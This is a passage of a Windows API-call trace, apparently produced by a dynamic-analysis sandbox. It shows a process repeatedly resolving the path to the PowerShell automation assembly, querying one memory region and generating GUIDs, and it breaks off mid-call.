lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.508] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc6231298, Data2=0x6874, Data3=0x482a, Data4=([0]=0xbe, [1]=0x81, [2]=0xa5, [3]=0xe3, [4]=0x7a, [5]=0x33, [6]=0x1a, [7]=0x11))) returned 0x0 [0091.508] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.509] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.509] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.509] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.509] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.510] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.510] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.511] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.511] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.511] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.511] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.512] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.512] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.512] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.512] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.513] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8ec23931, Data2=0x5d89, Data3=0x45ed, Data4=([0]=0xb2, [1]=0x56, [2]=0x98, [3]=0xc8, [4]=0x6, [5]=0x5a, [6]=0xf4, [7]=0x8c))) returned 0x0 [0091.513] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.514] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.514] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.514] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.514] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.515] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.515] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.515] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.515] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.515] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.516] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.516] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.516] VirtualQuery (in: lpAddress=0x16bf70, lpBuffer=0x16ce30, dwLength=0x30 | out: lpBuffer=0x16ce30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.516] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.516] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.517] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x257a1d8d, Data2=0xad39, Data3=0x431d, Data4=([0]=0x95, [1]=0xb7, [2]=0x12, [3]=0x4e, [4]=0x59, [5]=0xf1, [6]=0x39, [7]=0x66))) returned 0x0 [0091.517] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.518] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.519] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.520] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc8a2d592, Data2=0x52e1, Data3=0x4c37, Data4=([0]=0xbf, [1]=0xfc, [2]=0x5f, [3]=0xa1, [4]=0x24, [5]=0xbf, [6]=0xba, [7]=0x5b))) returned 0x0 [0091.520] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x2f0d70c2, Data2=0x2e3f, Data3=0x4fc1, Data4=([0]=0xb2, [1]=0xd5, [2]=0x5a, [3]=0xe7, [4]=0x37, [5]=0x42, [6]=0x3e, [7]=0x2))) returned 0x0 [0091.520] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xa98a86ad, Data2=0x592a, Data3=0x4338, Data4=([0]=0xaa, [1]=0x5c, [2]=0xa1, [3]=0x28, [4]=0x9, [5]=0x9c, [6]=0x3b, [7]=0x40))) returned 0x0 [0091.520] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xa352ec89, Data2=0x14c6, Data3=0x4ce1, Data4=([0]=0x94, [1]=0xc8, [2]=0x36, [3]=0x23, [4]=0x96, [5]=0x64, [6]=0x93, [7]=0x74))) returned 0x0 [0091.521] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xceda632f, Data2=0xa57f, Data3=0x4661, Data4=([0]=0xbb, [1]=0x43, [2]=0xca, [3]=0xe3, [4]=0xb9, [5]=0x39, [6]=0xf7, [7]=0x20))) returned 0x0 [0091.521] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.521] VirtualQuery (in: lpAddress=0x16bd40, lpBuffer=0x16cc00, dwLength=0x30 | out: lpBuffer=0x16cc00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.521] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x3387bc71, Data2=0x455c, Data3=0x4e8b, Data4=([0]=0xb0, [1]=0xee, [2]=0xea, [3]=0x6, [4]=0x2c, [5]=0x8e, [6]=0x77, [7]=0x36))) returned 0x0 [0091.522] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xf5945785, Data2=0x2473, Data3=0x4eca, Data4=([0]=0x8b, [1]=0x62, [2]=0x1, [3]=0x44, [4]=0x4c, [5]=0x14, [6]=0x44, [7]=0xf1))) returned 0x0 [0091.522] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6f1e9c6b, Data2=0xfd01, Data3=0x4e50, Data4=([0]=0x84, [1]=0x34, [2]=0x9f, [3]=0x1c, [4]=0x4c, [5]=0x18, 